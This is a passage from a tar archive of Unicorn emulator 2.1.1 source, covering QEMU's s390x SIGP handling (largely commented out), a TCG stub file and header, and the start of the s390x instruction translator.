*dst_cpu, SigpInfo *si) // { // uint8_t state = s390_cpu_get_state(dst_cpu); // bool ext_call = dst_cpu->env.pending_int & INTERRUPT_EXTERNAL_CALL; // uint64_t status = 0; // /* sensing without locks is racy, but it's the same for real hw */ // if (state != S390_CPU_STATE_STOPPED && !ext_call) { // si->cc = SIGP_CC_ORDER_CODE_ACCEPTED; // } else { // if (ext_call) { // status |= SIGP_STAT_EXT_CALL_PENDING; // } // if (state == S390_CPU_STATE_STOPPED) { // status |= SIGP_STAT_STOPPED; // } // set_sigp_status(si, status); // } // } // static void sigp_external_call(S390CPU *src_cpu, S390CPU *dst_cpu, SigpInfo *si) // { // int ret; // ret = cpu_inject_external_call(dst_cpu, src_cpu->env.core_id); // if (!ret) { // si->cc = SIGP_CC_ORDER_CODE_ACCEPTED; // } else { // set_sigp_status(si, SIGP_STAT_EXT_CALL_PENDING); // } // } // static void sigp_emergency(S390CPU *src_cpu, S390CPU *dst_cpu, SigpInfo *si) // { // cpu_inject_emergency_signal(dst_cpu, src_cpu->env.core_id); // si->cc = SIGP_CC_ORDER_CODE_ACCEPTED; // } #if 0 static void sigp_start(CPUState *cs, run_on_cpu_data arg) { S390CPU *cpu = S390_CPU(cs); SigpInfo *si = arg.host_ptr; if (s390_cpu_get_state(cpu) != S390_CPU_STATE_STOPPED) { si->cc = SIGP_CC_ORDER_CODE_ACCEPTED; return; } s390_cpu_set_state(S390_CPU_STATE_OPERATING, cpu); si->cc = SIGP_CC_ORDER_CODE_ACCEPTED; } static void sigp_stop(CPUState *cs, run_on_cpu_data arg) { S390CPU *cpu = S390_CPU(cs); SigpInfo *si = arg.host_ptr; if (s390_cpu_get_state(cpu) != S390_CPU_STATE_OPERATING) { si->cc = SIGP_CC_ORDER_CODE_ACCEPTED; return; } /* disabled wait - sleeping in user space */ if (cs->halted) { s390_cpu_set_state(S390_CPU_STATE_STOPPED, 
cpu); } else { /* execute the stop function */ cpu->env.sigp_order = SIGP_STOP; cpu_inject_stop(cpu); } si->cc = SIGP_CC_ORDER_CODE_ACCEPTED; } static void sigp_stop_and_store_status(CPUState *cs, run_on_cpu_data arg) { S390CPU *cpu = S390_CPU(cs); SigpInfo *si = arg.host_ptr; /* disabled wait - sleeping in user space */ if (s390_cpu_get_state(cpu) == S390_CPU_STATE_OPERATING && cs->halted) { s390_cpu_set_state(S390_CPU_STATE_STOPPED, cpu); } switch (s390_cpu_get_state(cpu)) { case S390_CPU_STATE_OPERATING: cpu->env.sigp_order = SIGP_STOP_STORE_STATUS; cpu_inject_stop(cpu); /* store will be performed in do_stop_interrup() */ break; case S390_CPU_STATE_STOPPED: /* already stopped, just store the status */ // cpu_synchronize_state(cs); s390_store_status(cpu, S390_STORE_STATUS_DEF_ADDR, true); break; } si->cc = SIGP_CC_ORDER_CODE_ACCEPTED; } static void sigp_store_status_at_address(CPUState *cs, run_on_cpu_data arg) { S390CPU *cpu = S390_CPU(cs); SigpInfo *si = arg.host_ptr; uint32_t address = si->param & 0x7ffffe00u; /* cpu has to be stopped */ if (s390_cpu_get_state(cpu) != S390_CPU_STATE_STOPPED) { set_sigp_status(si, SIGP_STAT_INCORRECT_STATE); return; } // cpu_synchronize_state(cs); if (s390_store_status(cpu, address, false)) { set_sigp_status(si, SIGP_STAT_INVALID_PARAMETER); return; } si->cc = SIGP_CC_ORDER_CODE_ACCEPTED; } #define ADTL_SAVE_LC_MASK 0xfUL static void sigp_store_adtl_status(CPUState *cs, run_on_cpu_data arg) { S390CPU *cpu = S390_CPU(cs); SigpInfo *si = arg.host_ptr; uint8_t lc = si->param & ADTL_SAVE_LC_MASK; hwaddr addr = si->param & ~ADTL_SAVE_LC_MASK; hwaddr len = 1UL << (lc ? lc : 10); if (!s390_has_feat(S390_FEAT_VECTOR) && !s390_has_feat(S390_FEAT_GUARDED_STORAGE)) { set_sigp_status(si, SIGP_STAT_INVALID_ORDER); return; } /* cpu has to be stopped */ if (s390_cpu_get_state(cpu) != S390_CPU_STATE_STOPPED) { set_sigp_status(si, SIGP_STAT_INCORRECT_STATE); return; } /* address must be aligned to length */ if (addr & (len - 1)) { set_sigp_status(si, SIGP_STAT_INVALID_PARAMETER); return; } /* no GS: only lc == 0 is valid */ if (!s390_has_feat(S390_FEAT_GUARDED_STORAGE) && lc != 0) { set_sigp_status(si, SIGP_STAT_INVALID_PARAMETER); return; } /* GS: 0, 10, 11, 12 are valid */ if (s390_has_feat(S390_FEAT_GUARDED_STORAGE) && lc != 0 && lc != 10 && lc != 11 && lc != 12) { set_sigp_status(si, SIGP_STAT_INVALID_PARAMETER); return; } // cpu_synchronize_state(cs); if (s390_store_adtl_status(cpu, addr, len)) { set_sigp_status(si, SIGP_STAT_INVALID_PARAMETER); return; } si->cc = SIGP_CC_ORDER_CODE_ACCEPTED; } static void sigp_restart(CPUState *cs, run_on_cpu_data arg) { S390CPU *cpu = S390_CPU(cs); SigpInfo *si = arg.host_ptr; switch (s390_cpu_get_state(cpu)) { case S390_CPU_STATE_STOPPED: /* the restart irq has to be delivered prior to any other pending irq */ // cpu_synchronize_state(cs); /* * Set OPERATING (and unhalting) before loading the restart PSW. * load_psw() will then properly halt the CPU again if necessary (TCG). 
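         *
         * (For an initially stopped CPU this means a hypothetical guest is
         * resumed at the restart new PSW fetched from its lowcore.)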
*/ s390_cpu_set_state(S390_CPU_STATE_OPERATING, cpu); do_restart_interrupt(&cpu->env); break; case S390_CPU_STATE_OPERATING: cpu_inject_restart(cpu); break; } si->cc = SIGP_CC_ORDER_CODE_ACCEPTED; } static void sigp_initial_cpu_reset(CPUState *cs, run_on_cpu_data arg) { S390CPU *cpu = S390_CPU(cs); S390CPUClass *scc = S390_CPU_GET_CLASS(cpu); SigpInfo *si = arg.host_ptr; // cpu_synchronize_state(cs); scc->reset(cs, S390_CPU_RESET_INITIAL); // cpu_synchronize_post_reset(cs); si->cc = SIGP_CC_ORDER_CODE_ACCEPTED; } static void sigp_cpu_reset(CPUState *cs, run_on_cpu_data arg) { S390CPU *cpu = S390_CPU(cs); S390CPUClass *scc = S390_CPU_GET_CLASS(cpu); SigpInfo *si = arg.host_ptr; // cpu_synchronize_state(cs); scc->reset(cs, S390_CPU_RESET_NORMAL); // cpu_synchronize_post_reset(cs); si->cc = SIGP_CC_ORDER_CODE_ACCEPTED; } static void sigp_set_prefix(CPUState *cs, run_on_cpu_data arg) { S390CPU *cpu = S390_CPU(cs); CPUS390XState *env = &cpu->env; SigpInfo *si = arg.host_ptr; uint32_t addr = si->param & 0x7fffe000u; // cpu_synchronize_state(cs); if (!address_space_access_valid(env_cpu(env)->as, addr, sizeof(struct LowCore), false, MEMTXATTRS_UNSPECIFIED)) { set_sigp_status(si, SIGP_STAT_INVALID_PARAMETER); return; } /* cpu has to be stopped */ if (s390_cpu_get_state(cpu) != S390_CPU_STATE_STOPPED) { set_sigp_status(si, SIGP_STAT_INCORRECT_STATE); return; } cpu->env.psa = addr; tlb_flush(cs); // cpu_synchronize_post_init(cs); si->cc = SIGP_CC_ORDER_CODE_ACCEPTED; } #endif // static void sigp_cond_emergency(S390CPU *src_cpu, S390CPU *dst_cpu, // SigpInfo *si) // { // const uint64_t psw_int_mask = PSW_MASK_IO | PSW_MASK_EXT; // uint16_t p_asn, s_asn, asn; // uint64_t psw_addr, psw_mask; // bool idle; // /* this looks racy, but these values are only used when STOPPED */ // idle = CPU(dst_cpu)->halted; // psw_addr = dst_cpu->env.psw.addr; // psw_mask = dst_cpu->env.psw.mask; // asn = si->param; // p_asn = dst_cpu->env.cregs[4] & 0xffff; /* Primary ASN */ // s_asn = dst_cpu->env.cregs[3] & 0xffff; /* Secondary ASN */ // if (s390_cpu_get_state(dst_cpu) != S390_CPU_STATE_STOPPED || // (psw_mask & psw_int_mask) != psw_int_mask || // (idle && psw_addr != 0) || // (!idle && (asn == p_asn || asn == s_asn))) { // cpu_inject_emergency_signal(dst_cpu, src_cpu->env.core_id); // } else { // set_sigp_status(si, SIGP_STAT_INCORRECT_STATE); // } // si->cc = SIGP_CC_ORDER_CODE_ACCEPTED; // } // static void sigp_sense_running(S390CPU *dst_cpu, SigpInfo *si) // { // /* sensing without locks is racy, but it's the same for real hw */ // //if (!s390_has_feat(S390_FEAT_SENSE_RUNNING_STATUS)) { // // set_sigp_status(si, SIGP_STAT_INVALID_ORDER); // // return; // //} // /* If halted (which includes also STOPPED), it is not running */ // if (CPU(dst_cpu)->halted) { // set_sigp_status(si, SIGP_STAT_NOT_RUNNING); // } else { // si->cc = SIGP_CC_ORDER_CODE_ACCEPTED; // } // } // static int handle_sigp_single_dst(S390CPU *cpu, S390CPU *dst_cpu, uint8_t order, // uint64_t param, uint64_t *status_reg) // { // SigpInfo si = { // .param = param, // .status_reg = status_reg, // }; // /* cpu available? 
*/ // if (dst_cpu == NULL) { // return SIGP_CC_NOT_OPERATIONAL; // } // /* only resets can break pending orders */ // if (dst_cpu->env.sigp_order != 0 && // order != SIGP_CPU_RESET && // order != SIGP_INITIAL_CPU_RESET) { // return SIGP_CC_BUSY; // } // switch (order) { // case SIGP_SENSE: // sigp_sense(dst_cpu, &si); // break; // case SIGP_EXTERNAL_CALL: // sigp_external_call(cpu, dst_cpu, &si); // break; // case SIGP_EMERGENCY: // sigp_emergency(cpu, dst_cpu, &si); // break; // case SIGP_START: // //run_on_cpu(CPU(dst_cpu), sigp_start, RUN_ON_CPU_HOST_PTR(&si)); // break; // case SIGP_STOP: // //run_on_cpu(CPU(dst_cpu), sigp_stop, RUN_ON_CPU_HOST_PTR(&si)); // break; // case SIGP_RESTART: // //run_on_cpu(CPU(dst_cpu), sigp_restart, RUN_ON_CPU_HOST_PTR(&si)); // break; // case SIGP_STOP_STORE_STATUS: // //run_on_cpu(CPU(dst_cpu), sigp_stop_and_store_status, RUN_ON_CPU_HOST_PTR(&si)); // break; // case SIGP_STORE_STATUS_ADDR: // //run_on_cpu(CPU(dst_cpu), sigp_store_status_at_address, RUN_ON_CPU_HOST_PTR(&si)); // break; // case SIGP_STORE_ADTL_STATUS: // //run_on_cpu(CPU(dst_cpu), sigp_store_adtl_status, RUN_ON_CPU_HOST_PTR(&si)); // break; // case SIGP_SET_PREFIX: // //run_on_cpu(CPU(dst_cpu), sigp_set_prefix, RUN_ON_CPU_HOST_PTR(&si)); // break; // case SIGP_INITIAL_CPU_RESET: // //run_on_cpu(CPU(dst_cpu), sigp_initial_cpu_reset, RUN_ON_CPU_HOST_PTR(&si)); // break; // case SIGP_CPU_RESET: // //run_on_cpu(CPU(dst_cpu), sigp_cpu_reset, RUN_ON_CPU_HOST_PTR(&si)); // break; // case SIGP_COND_EMERGENCY: // sigp_cond_emergency(cpu, dst_cpu, &si); // break; // case SIGP_SENSE_RUNNING: // sigp_sense_running(dst_cpu, &si); // break; // default: // set_sigp_status(&si, SIGP_STAT_INVALID_ORDER); // } // return si.cc; // } // static int sigp_set_architecture(S390CPU *cpu, uint32_t param, // uint64_t *status_reg) // { // bool all_stopped = true; // #if 0 // CPU_FOREACH(cur_cs) { // cur_cpu = S390_CPU(cur_cs); // if (cur_cpu == cpu) { // continue; // } // if (s390_cpu_get_state(cur_cpu) != S390_CPU_STATE_STOPPED) { // all_stopped = false; // } // } // #endif // all_stopped = false; // *status_reg &= 0xffffffff00000000ULL; // /* Reject set arch order, with czam we're always in z/Arch mode. */ // *status_reg |= (all_stopped ? SIGP_STAT_INVALID_PARAMETER : // SIGP_STAT_INCORRECT_STATE); // return SIGP_CC_STATUS_STORED; // } #if 0 int handle_sigp(CPUS390XState *env, uint8_t order, uint64_t r1, uint64_t r3) { uint64_t *status_reg = &env->regs[r1]; uint64_t param = (r1 % 2) ? 
env->regs[r1] : env->regs[r1 + 1]; S390CPU *cpu = env_archcpu(env); S390CPU *dst_cpu = NULL; int ret; switch (order) { case SIGP_SET_ARCH: ret = sigp_set_architecture(cpu, param, status_reg); break; default: /* all other sigp orders target a single vcpu */ dst_cpu = s390_cpu_addr2state(env->regs[r3]); ret = handle_sigp_single_dst(cpu, dst_cpu, order, param, status_reg); } return ret; } #endif int s390_cpu_restart(S390CPU *cpu) { //SigpInfo si = {}; //run_on_cpu(CPU(cpu), sigp_restart, RUN_ON_CPU_HOST_PTR(&si)); return 0; } void do_stop_interrupt(CPUS390XState *env) { S390CPU *cpu = env_archcpu(env); if (s390_cpu_set_state(S390_CPU_STATE_STOPPED, cpu) == 0) { // qemu_system_shutdown_request(SHUTDOWN_CAUSE_GUEST_SHUTDOWN); } if (cpu->env.sigp_order == SIGP_STOP_STORE_STATUS) { s390_store_status(cpu, S390_STORE_STATUS_DEF_ADDR, true); } env->sigp_order = 0; env->pending_int &= ~INTERRUPT_STOP; } void s390_init_sigp(void) { } ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/tcg-stub.c����������������������������������������������������������0000664�0000000�0000000�00000000570�14675241067�0020225�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU TCG support -- s390x specific function stubs. * * Copyright (C) 2018 Red Hat Inc * * Authors: * David Hildenbrand <david@redhat.com> * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #include "qemu/osdep.h" #include "qemu-common.h" #include "cpu.h" #include "tcg_s390x.h"����������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/tcg_s390x.h���������������������������������������������������������0000664�0000000�0000000�00000001475�14675241067�0020232�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU TCG support -- s390x specific functions. * * Copyright 2018 Red Hat, Inc. * * Authors: * David Hildenbrand <david@redhat.com> * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. 
*/ #ifndef TCG_S390X_H #define TCG_S390X_H void tcg_s390_tod_updated(CPUState *cs, run_on_cpu_data opaque); void QEMU_NORETURN tcg_s390_program_interrupt(CPUS390XState *env, uint32_t code, uintptr_t ra); void QEMU_NORETURN tcg_s390_data_exception(CPUS390XState *env, uint32_t dxc, uintptr_t ra); void QEMU_NORETURN tcg_s390_vector_exception(CPUS390XState *env, uint32_t vxc, uintptr_t ra); #endif /* TCG_S390X_H */ ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/translate.c���������������������������������������������������������0000664�0000000�0000000�00000632113�14675241067�0020476�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * S/390 translation * * Copyright (c) 2009 Ulrich Hecht * Copyright (c) 2010 Alexander Graf * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /* #define DEBUG_INLINE_BRANCHES */ #define S390X_DEBUG_DISAS /* #define S390X_DEBUG_DISAS_VERBOSE */ #ifdef S390X_DEBUG_DISAS_VERBOSE # define LOG_DISAS(...) qemu_log(__VA_ARGS__) #else # define LOG_DISAS(...) do { } while (0) #endif #include "qemu/osdep.h" #include "cpu.h" #include "internal.h" #include "exec/exec-all.h" #include "tcg/tcg-op.h" #include "tcg/tcg-op-gvec.h" #include "qemu/log.h" #include "qemu/host-utils.h" #include "exec/cpu_ldst.h" #include "exec/gen-icount.h" #include "exec/helper-proto.h" #include "exec/helper-gen.h" #include "exec/translator.h" #include "qemu/atomic128.h" /* Information that (most) every instruction needs to manipulate. */ typedef struct DisasContext DisasContext; typedef struct DisasInsn DisasInsn; typedef struct DisasFields DisasFields; /* * Define a structure to hold the decoded fields. We'll store each inside * an array indexed by an enum. In order to conserve memory, we'll arrange * for fields that do not exist at the same time to overlap, thus the "C" * for compact. For checking purposes there is an "O" for original index * as well that will be applied to availability bitmaps. 
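 *
 * For example, r1, m1, b1, i1 and v1 all share compact slot 0
 * (FLD_C_r1 == FLD_C_m1 == 0 below), since no instruction format uses
 * more than one of them at the same time.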
*/ enum DisasFieldIndexO { FLD_O_r1, FLD_O_r2, FLD_O_r3, FLD_O_m1, FLD_O_m3, FLD_O_m4, FLD_O_m5, FLD_O_m6, FLD_O_b1, FLD_O_b2, FLD_O_b4, FLD_O_d1, FLD_O_d2, FLD_O_d4, FLD_O_x2, FLD_O_l1, FLD_O_l2, FLD_O_i1, FLD_O_i2, FLD_O_i3, FLD_O_i4, FLD_O_i5, FLD_O_v1, FLD_O_v2, FLD_O_v3, FLD_O_v4, }; enum DisasFieldIndexC { FLD_C_r1 = 0, FLD_C_m1 = 0, FLD_C_b1 = 0, FLD_C_i1 = 0, FLD_C_v1 = 0, FLD_C_r2 = 1, FLD_C_b2 = 1, FLD_C_i2 = 1, FLD_C_r3 = 2, FLD_C_m3 = 2, FLD_C_i3 = 2, FLD_C_v3 = 2, FLD_C_m4 = 3, FLD_C_b4 = 3, FLD_C_i4 = 3, FLD_C_l1 = 3, FLD_C_v4 = 3, FLD_C_i5 = 4, FLD_C_d1 = 4, FLD_C_m5 = 4, FLD_C_d2 = 5, FLD_C_m6 = 5, FLD_C_d4 = 6, FLD_C_x2 = 6, FLD_C_l2 = 6, FLD_C_v2 = 6, NUM_C_FIELD = 7 }; struct DisasFields { uint64_t raw_insn; unsigned op:8; unsigned op2:8; unsigned presentC:16; unsigned int presentO; int c[NUM_C_FIELD]; }; struct DisasContext { DisasContextBase base; const DisasInsn *insn; DisasFields fields; uint64_t ex_value; /* * During translate_one(), pc_tmp is used to determine the instruction * to be executed after base.pc_next - e.g. next sequential instruction * or a branch target. */ uint64_t pc_tmp; uint32_t ilen; enum cc_op cc_op; bool do_debug; // Unicorn struct uc_struct *uc; }; /* Information carried about a condition to be evaluated. */ typedef struct { TCGCond cond:8; bool is_64; bool g1; bool g2; union { struct { TCGv_i64 a, b; } s64; struct { TCGv_i32 a, b; } s32; } u; } DisasCompare; #ifdef DEBUG_INLINE_BRANCHES static uint64_t inline_branch_hit[CC_OP_MAX]; static uint64_t inline_branch_miss[CC_OP_MAX]; #endif static void pc_to_link_info(TCGContext *tcg_ctx, TCGv_i64 out, DisasContext *s, uint64_t pc) { TCGv_i64 tmp; if (s->base.tb->flags & FLAG_MASK_32) { if (s->base.tb->flags & FLAG_MASK_64) { tcg_gen_movi_i64(tcg_ctx, out, pc); return; } pc |= 0x80000000; } assert(!(s->base.tb->flags & FLAG_MASK_64)); tmp = tcg_const_i64(tcg_ctx, pc); tcg_gen_deposit_i64(tcg_ctx, out, out, tmp, 0, 32); tcg_temp_free_i64(tcg_ctx, tmp); } void s390x_translate_init(struct uc_struct *uc) { TCGContext *tcg_ctx = uc->tcg_ctx; int i; tcg_ctx->psw_addr = tcg_global_mem_new_i64(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUS390XState, psw.addr), "psw_addr"); tcg_ctx->psw_mask = tcg_global_mem_new_i64(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUS390XState, psw.mask), "psw_mask"); tcg_ctx->gbea = tcg_global_mem_new_i64(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUS390XState, gbea), "gbea"); tcg_ctx->cc_op = tcg_global_mem_new_i32(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUS390XState, cc_op), "cc_op"); tcg_ctx->cc_src = tcg_global_mem_new_i64(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUS390XState, cc_src), "cc_src"); tcg_ctx->cc_dst = tcg_global_mem_new_i64(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUS390XState, cc_dst), "cc_dst"); tcg_ctx->cc_vr = tcg_global_mem_new_i64(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUS390XState, cc_vr), "cc_vr"); for (i = 0; i < 16; i++) { snprintf(tcg_ctx->s390x_cpu_reg_names[i], sizeof(tcg_ctx->s390x_cpu_reg_names[0]), "r%d", i); tcg_ctx->regs[i] = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUS390XState, regs[i]), tcg_ctx->s390x_cpu_reg_names[i]); } } static inline int vec_full_reg_offset(uint8_t reg) { g_assert(reg < 32); return offsetof(CPUS390XState, vregs[reg][0]); } static inline int vec_reg_offset(uint8_t reg, uint8_t enr, MemOp es) { /* Convert element size (es) - e.g. MO_8 - to bytes */ const uint8_t bytes = 1 << es; int offs = enr * bytes; /* * vregs[n][0] is the lowest 8 byte and vregs[n][1] the highest 8 byte * of the 16 byte vector, on both, little and big endian systems. 
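 *
 * For example, with es = MO_32 and enr = 1, the big endian offset below
 * is enr * 4 = 4; on a little endian host the XOR with (8 - bytes) = 4
 * maps that to byte offset 0 within the containing 8 byte half.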
* * Big Endian (target/possible host) * B: [ 0][ 1][ 2][ 3][ 4][ 5][ 6][ 7] - [ 8][ 9][10][11][12][13][14][15] * HW: [ 0][ 1][ 2][ 3] - [ 4][ 5][ 6][ 7] * W: [ 0][ 1] - [ 2][ 3] * DW: [ 0] - [ 1] * * Little Endian (possible host) * B: [ 7][ 6][ 5][ 4][ 3][ 2][ 1][ 0] - [15][14][13][12][11][10][ 9][ 8] * HW: [ 3][ 2][ 1][ 0] - [ 7][ 6][ 5][ 4] * W: [ 1][ 0] - [ 3][ 2] * DW: [ 0] - [ 1] * * For 16 byte elements, the two 8 byte halves will not form a host * int128 if the host is little endian, since they're in the wrong order. * Some operations (e.g. xor) do not care. For operations like addition, * the two 8 byte elements have to be loaded separately. Let's force all * 16 byte operations to handle it in a special way. */ g_assert(es <= MO_64); #ifndef HOST_WORDS_BIGENDIAN offs ^= (8 - bytes); #endif return offs + vec_full_reg_offset(reg); } static inline int freg64_offset(uint8_t reg) { g_assert(reg < 16); return vec_reg_offset(reg, 0, MO_64); } static inline int freg32_offset(uint8_t reg) { g_assert(reg < 16); return vec_reg_offset(reg, 0, MO_32); } static TCGv_i64 load_reg(TCGContext *tcg_ctx, int reg) { TCGv_i64 r = tcg_temp_new_i64(tcg_ctx); tcg_gen_mov_i64(tcg_ctx, r, tcg_ctx->regs[reg]); return r; } static TCGv_i64 load_freg(TCGContext *tcg_ctx, int reg) { TCGv_i64 r = tcg_temp_new_i64(tcg_ctx); tcg_gen_ld_i64(tcg_ctx, r, tcg_ctx->cpu_env, freg64_offset(reg)); return r; } static TCGv_i64 load_freg32_i64(TCGContext *tcg_ctx, int reg) { TCGv_i64 r = tcg_temp_new_i64(tcg_ctx); tcg_gen_ld32u_i64(tcg_ctx, r, tcg_ctx->cpu_env, freg32_offset(reg)); return r; } static void store_reg(TCGContext *tcg_ctx, int reg, TCGv_i64 v) { tcg_gen_mov_i64(tcg_ctx, tcg_ctx->regs[reg], v); } static void store_freg(TCGContext *tcg_ctx, int reg, TCGv_i64 v) { tcg_gen_st_i64(tcg_ctx, v, tcg_ctx->cpu_env, freg64_offset(reg)); } static void store_reg32_i64(TCGContext *tcg_ctx, int reg, TCGv_i64 v) { /* 32 bit register writes keep the upper half */ tcg_gen_deposit_i64(tcg_ctx, tcg_ctx->regs[reg], tcg_ctx->regs[reg], v, 0, 32); } static void store_reg32h_i64(TCGContext *tcg_ctx, int reg, TCGv_i64 v) { tcg_gen_deposit_i64(tcg_ctx, tcg_ctx->regs[reg], tcg_ctx->regs[reg], v, 32, 32); } static void store_freg32_i64(TCGContext *tcg_ctx, int reg, TCGv_i64 v) { tcg_gen_st32_i64(tcg_ctx, v, tcg_ctx->cpu_env, freg32_offset(reg)); } static void return_low128(TCGContext *tcg_ctx, TCGv_i64 dest) { tcg_gen_ld_i64(tcg_ctx, dest, tcg_ctx->cpu_env, offsetof(CPUS390XState, retxl)); } static void update_psw_addr(DisasContext *s) { /* psw.addr */ TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_movi_i64(tcg_ctx, tcg_ctx->psw_addr, s->base.pc_next); } static void per_branch(DisasContext *s, bool to_next) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_movi_i64(tcg_ctx, tcg_ctx->gbea, s->base.pc_next); if (s->base.tb->flags & FLAG_MASK_PER) { TCGv_i64 next_pc = to_next ? 
tcg_const_i64(tcg_ctx, s->pc_tmp) : tcg_ctx->psw_addr; gen_helper_per_branch(tcg_ctx, tcg_ctx->cpu_env, tcg_ctx->gbea, next_pc); if (to_next) { tcg_temp_free_i64(tcg_ctx, next_pc); } } } static void per_branch_cond(DisasContext *s, TCGCond cond, TCGv_i64 arg1, TCGv_i64 arg2) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (s->base.tb->flags & FLAG_MASK_PER) { TCGLabel *lab = gen_new_label(tcg_ctx); tcg_gen_brcond_i64(tcg_ctx, tcg_invert_cond(cond), arg1, arg2, lab); tcg_gen_movi_i64(tcg_ctx, tcg_ctx->gbea, s->base.pc_next); gen_helper_per_branch(tcg_ctx, tcg_ctx->cpu_env, tcg_ctx->gbea, tcg_ctx->psw_addr); gen_set_label(tcg_ctx, lab); } else { TCGv_i64 pc = tcg_const_i64(tcg_ctx, s->base.pc_next); tcg_gen_movcond_i64(tcg_ctx, cond, tcg_ctx->gbea, arg1, arg2, tcg_ctx->gbea, pc); tcg_temp_free_i64(tcg_ctx, pc); } } static void per_breaking_event(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_movi_i64(tcg_ctx, tcg_ctx->gbea, s->base.pc_next); } static void update_cc_op(DisasContext *s) { if (s->cc_op != CC_OP_DYNAMIC && s->cc_op != CC_OP_STATIC) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cc_op, s->cc_op); } } static inline uint64_t ld_code2(CPUS390XState *env, uint64_t pc) { return (uint64_t)cpu_lduw_code(env, pc); } static inline uint64_t ld_code4(CPUS390XState *env, uint64_t pc) { return (uint64_t)(uint32_t)cpu_ldl_code(env, pc); } static int get_mem_index(DisasContext *s) { if (!(s->base.tb->flags & FLAG_MASK_DAT)) { return MMU_REAL_IDX; } switch (s->base.tb->flags & FLAG_MASK_ASC) { case PSW_ASC_PRIMARY >> FLAG_MASK_PSW_SHIFT: return MMU_PRIMARY_IDX; case PSW_ASC_SECONDARY >> FLAG_MASK_PSW_SHIFT: return MMU_SECONDARY_IDX; case PSW_ASC_HOME >> FLAG_MASK_PSW_SHIFT: return MMU_HOME_IDX; default: tcg_abort(); break; } } static void gen_exception(TCGContext *tcg_ctx, int excp) { TCGv_i32 tmp = tcg_const_i32(tcg_ctx, excp); gen_helper_exception(tcg_ctx, tcg_ctx->cpu_env, tmp); tcg_temp_free_i32(tcg_ctx, tmp); } static void gen_program_exception(DisasContext *s, int code) { TCGv_i32 tmp; TCGContext *tcg_ctx = s->uc->tcg_ctx; /* Remember what pgm exeption this was. */ tmp = tcg_const_i32(tcg_ctx, code); tcg_gen_st_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPUS390XState, int_pgm_code)); tcg_temp_free_i32(tcg_ctx, tmp); tmp = tcg_const_i32(tcg_ctx, s->ilen); tcg_gen_st_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPUS390XState, int_pgm_ilen)); tcg_temp_free_i32(tcg_ctx, tmp); /* update the psw */ update_psw_addr(s); /* Save off cc. */ update_cc_op(s); /* Trigger exception. 
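   The exception helper does not return; it exits the CPU loop via
   cpu_loop_exit(), so the PSW address and cc saved above are what the
   interrupt delivery code will see.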
*/ gen_exception(tcg_ctx, EXCP_PGM); } static inline void gen_illegal_opcode(DisasContext *s) { gen_program_exception(s, PGM_OPERATION); } static inline void gen_data_exception(TCGContext *tcg_ctx, uint8_t dxc) { TCGv_i32 tmp = tcg_const_i32(tcg_ctx, dxc); gen_helper_data_exception(tcg_ctx, tcg_ctx->cpu_env, tmp); tcg_temp_free_i32(tcg_ctx, tmp); } static inline void gen_trap(DisasContext *s) { /* Set DXC to 0xff */ gen_data_exception(s->uc->tcg_ctx, 0xff); } static void gen_addi_and_wrap_i64(DisasContext *s, TCGv_i64 dst, TCGv_i64 src, int64_t imm) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_addi_i64(tcg_ctx, dst, src, imm); if (!(s->base.tb->flags & FLAG_MASK_64)) { if (s->base.tb->flags & FLAG_MASK_32) { tcg_gen_andi_i64(tcg_ctx, dst, dst, 0x7fffffff); } else { tcg_gen_andi_i64(tcg_ctx, dst, dst, 0x00ffffff); } } } static TCGv_i64 get_address(DisasContext *s, int x2, int b2, int d2) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); /* * Note that d2 is limited to 20 bits, signed. If we crop negative * displacements early we create larger immedate addends. */ if (b2 && x2) { tcg_gen_add_i64(tcg_ctx, tmp, tcg_ctx->regs[b2], tcg_ctx->regs[x2]); gen_addi_and_wrap_i64(s, tmp, tmp, d2); } else if (b2) { gen_addi_and_wrap_i64(s, tmp, tcg_ctx->regs[b2], d2); } else if (x2) { gen_addi_and_wrap_i64(s, tmp, tcg_ctx->regs[x2], d2); } else if (!(s->base.tb->flags & FLAG_MASK_64)) { if (s->base.tb->flags & FLAG_MASK_32) { tcg_gen_movi_i64(tcg_ctx, tmp, d2 & 0x7fffffff); } else { tcg_gen_movi_i64(tcg_ctx, tmp, d2 & 0x00ffffff); 